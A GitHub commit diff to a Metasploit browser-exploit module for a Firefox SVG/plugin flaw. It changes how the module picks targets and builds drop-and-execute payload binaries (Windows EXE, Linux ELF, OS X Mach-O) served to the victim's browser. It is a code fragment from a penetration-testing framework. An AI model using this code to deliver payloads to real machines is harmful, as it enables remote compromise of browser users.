Skip to content

Commit 6786179

Browse files
wchen-r7wchen-r7
committed
Fix automatic payload selection
1 parent 23fe314 commit 6786179

File tree

1 file changed

+25
-8
lines changed

1 file changed

+25
-8
lines changed

modules/exploits/multi/browser/firefox_svg_plugin.rb

Lines changed: 25 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -33,12 +33,15 @@ def initialize(info = {})
3333
with script access should be able to trigger it.
3434
},
3535
'License' => MSF_LICENSE,
36-
'Platform' => 'win',
3736
'Targets' =>
3837
[
39-
[ 'Automatic', {} ],
40-
[
41-
'Windows x86 (Native Payload)',
38+
[ 'Automatic',
39+
{
40+
'Platform' => ['win', 'linux', 'osx'],
41+
'Arch' => ARCH_X86
42+
}
43+
],
44+
[ 'Windows x86 (Native Payload)',
4245
{
4346
'Platform' => 'win',
4447
'Arch' => ARCH_X86
@@ -61,7 +64,8 @@ def initialize(info = {})
6164
'Author' =>
6265
[
6366
'Marius Mlynski', # discovery & bug report
64-
'joev' # metasploit module
67+
'joev', # metasploit module
68+
'sinn3r' # metasploit fu
6569
],
6670
'References' =>
6771
[
@@ -98,7 +102,7 @@ def on_request_uri(cli, request)
98102
elsif request.uri =~ /\.bin/
99103
# send the binary payload to drop & exec
100104
print_status("Child frame navigated. Sending binary payload to drop & execute.")
101-
send_response(cli, dropped_file_contents(cli), { 'Content-Type' => 'application/octet-stream' })
105+
send_response(cli, dropped_file_contents(cli, target), { 'Content-Type' => 'application/octet-stream' })
102106
else
103107
# send initial HTML page
104108
print_status("Target selected: #{target.name}")
@@ -109,9 +113,22 @@ def on_request_uri(cli, request)
109113
end
110114

111115
# @return [String] the encoded executable for dropping onto the client's machine
112-
def dropped_file_contents(cli)
116+
def dropped_file_contents(cli, target)
113117
return if ((p=regenerate_payload(cli)) == nil)
114-
generate_payload_exe( {:code=>p.encoded} )
118+
opts = target.opts
119+
exe = ''
120+
121+
case target.name
122+
when /windows/i
123+
opts = opts.merge({:code=>p.encoded})
124+
exe = generate_payload_exe(opts)
125+
when /linux/i
126+
exe = Msf::Util::EXE.to_linux_x86_elf(framework, p.encoded, opts)
127+
when /os x/i
128+
exe = Msf::Util::EXE.to_osx_x86_macho(framework, p.encoded, opts)
129+
end
130+
131+
return exe
115132
end
116133

117134
# @return [Msf::Module::Target] that matches the client's user-agent header

0 commit comments

Comments
 (0)